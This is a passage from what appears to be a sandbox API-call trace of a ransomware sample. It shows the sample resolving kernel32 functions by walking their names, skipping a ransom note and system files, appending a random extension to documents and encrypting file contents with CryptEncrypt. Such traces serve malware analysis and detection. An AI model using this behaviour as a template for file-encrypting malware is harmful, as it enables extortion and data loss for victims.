lpString1="CreateProcessA") returned="CreateProcessA" [0084.389] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.389] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.389] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.389] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.389] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.389] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.389] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.389] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.389] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.389] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.389] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.389] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.389] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.389] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.389] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.390] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.390] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.390] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.390] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.390] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.390] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.390] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.390] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.390] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.390] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.390] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.390] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.390] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.390] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.390] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.390] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.390] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.390] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.390] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.391] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.391] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.391] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.391] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.391] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.391] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.391] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.391] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.391] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.391] lstrlenA (lpString="DELETEATOM") returned 10 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.391] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.391] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.391] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.391] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.391] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.391] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.391] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.391] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.392] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.392] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.392] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.392] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.392] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.392] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.392] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.392] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.392] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.392] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.392] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.393] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.393] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.393] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.393] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.393] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.393] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.393] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.393] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.393] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.393] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.393] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.393] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.393] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.393] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.393] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.393] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.394] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.394] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.394] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.394] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.394] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.394] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.394] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx") returned 82 [0084.394] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW") returned 89 [0084.394] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\1fbhjo h3cvvf6llyw8c.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\1fbhjo h3cvvf6llyw8c.xlsx.wzkbzw"), dwFlags=0x0) returned 1 [0084.396] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.396] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.396] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.396] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb63c6c00, ftCreationTime.dwHighDateTime=0x1d4ce47, ftLastAccessTime.dwLowDateTime=0xcc8ecc0, ftLastAccessTime.dwHighDateTime=0x1d4cb9f, ftLastWriteTime.dwLowDateTime=0xcc8ecc0, ftLastWriteTime.dwHighDateTime=0x1d4cb9f, nFileSizeHigh=0x0, nFileSizeLow=0x50e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="a05Mw73tf.docx", cAlternateFileName="A05MW7~1.DOC")) returned 1 [0084.396] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="DECRYPT-FILES.txt") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="autorun.inf") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="boot.ini") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="desktop.ini") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="ntuser.dat") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="iconcache.db") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="bootsect.bak") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="ntuser.dat.log") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="thumbs.db") returned -1 [0084.397] lstrcmpiW (lpString1="a05Mw73tf.docx", lpString2="Bootfont.bin") returned -1 [0084.397] lstrlenW (lpString="a05Mw73tf.docx") returned 14 [0084.397] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.397] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.397] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.397] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.397] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.397] lstrlenW (lpString="a05Mw73tf.docx") returned 14 [0084.397] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.397] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="a05Mw73tf.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx" [0084.397] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\a05mw73tf.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.397] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=20706) returned 1 [0084.397] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.398] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.398] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.398] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.398] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.398] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.398] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.399] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.399] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.400] CloseHandle (hObject=0x42c) returned 1 [0084.400] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.400] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.401] CloseHandle (hObject=0x0) returned 0 [0084.401] CloseHandle (hObject=0x428) returned 1 [0084.401] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.401] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.401] GetTickCount () returned 0x114d901 [0084.401] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.402] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.402] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.402] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.402] lstrlenA (lpString="kernel32.dll") returned 12 [0084.402] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.402] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.402] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.402] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.402] lstrlenA (lpString="ADDATOMA") returned 8 [0084.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.402] lstrlenA (lpString="ADDATOMW") returned 8 [0084.402] 